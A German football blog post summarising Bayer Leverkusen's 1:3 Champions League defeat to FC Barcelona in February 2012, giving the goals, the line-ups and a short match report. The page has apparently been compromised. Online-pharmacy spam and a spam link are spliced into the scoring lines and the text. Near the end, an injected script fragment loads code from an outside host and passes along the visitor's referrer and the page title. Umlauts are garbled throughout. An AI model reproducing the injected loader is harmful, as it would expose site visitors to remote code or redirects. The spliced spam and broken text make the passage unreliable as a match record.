Willkommen auf » CL 2011/12 Highlights Bayer Leverkusen – FC Barcelona
14. Feb 2012

CL 2011/12 Highlights Bayer Leverkusen – FC Barcelona

Champions League 2011/12 Achtelfinale Hinspiel
Bayer Leverkusen – FC Barcelona 1:3

0:1 Alexis Sanchez (41., Rechtsschuss, Messi)
cheap vasotec 5 how much does proventil cost without insurance 1:1 zoton http://danaconsultant.com/2018/03/18/cheap-menosan-reviews/ Michal Kadlec (52., Kopfball, Corluka)
original accutane pharmacies incanada Order purchase bupron 1:2 Purchase Alexis Sanchez (55., Rechtsschuss, Fabregas)
Purchase Pills 1:3 Purchase Lionel Messi (88., Linksschuss, Dani Alves)
vor 29.400 Zuschauern in der ausverkauften BayArena in Leverkusen

Aufstellung Leverkusen: Leno – Corluka (90. + 1 da Costa), M. Friedrich, Schwaab, Kadlec – Reinartz, Rolfes (77. KieAYling), L. Bender – Castro, Renato Augusto – SchA?rrle (90. Bellarabi)

Aufstellung Barcelona: Victor Valdes – Dani Alves, Mascherano, Puyol, Abidal – Busquets – Fabregas, Iniesta (60. Thiago Alcantara) – Adriano (69. Pedro), Sanchez (85. Cuenca) – Messi

Die Zusammenfassung des Spiels…

AuAYerdem auch hier, hier, hier, hier, hier und im methotrexate costco ZDF-Kurzbericht zu sehen

Die erste Halbzeit spielte sich fast gA�nzlich in der Leverkusener HA�lfte ab. Bayer bunkerte ohne Ende und kassierte trotzdem den Gegentreffer durch Sanchez.
Nach der Pause entwickelte sich jedoch eine durchaus muntere Partie, bei der Leverkusen phasenweise gut mitspielte und so auch verdient zum zwischenzeitlichen Ausgleich durch Kadlec kam. Danach aber alles wie gewohnt, Barca drehte nochmal auf und steht nun mit den drei AuswA�rtstoren auch mit mehr als einem Bein im Viertelfinale. Beim RA?ckspiel in zwei Wochen brA�uchte die Bayer-Elf ein mittelgroAYes FuAYball-Wunder. Wird wohl ein lockerer Betriebsausflug werden, bei dem man die Chance erhA�lt, sich ehrenhaft aus dem Wettbewerb zu verabschieden.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “; Cheap


Einen Kommentar schreiben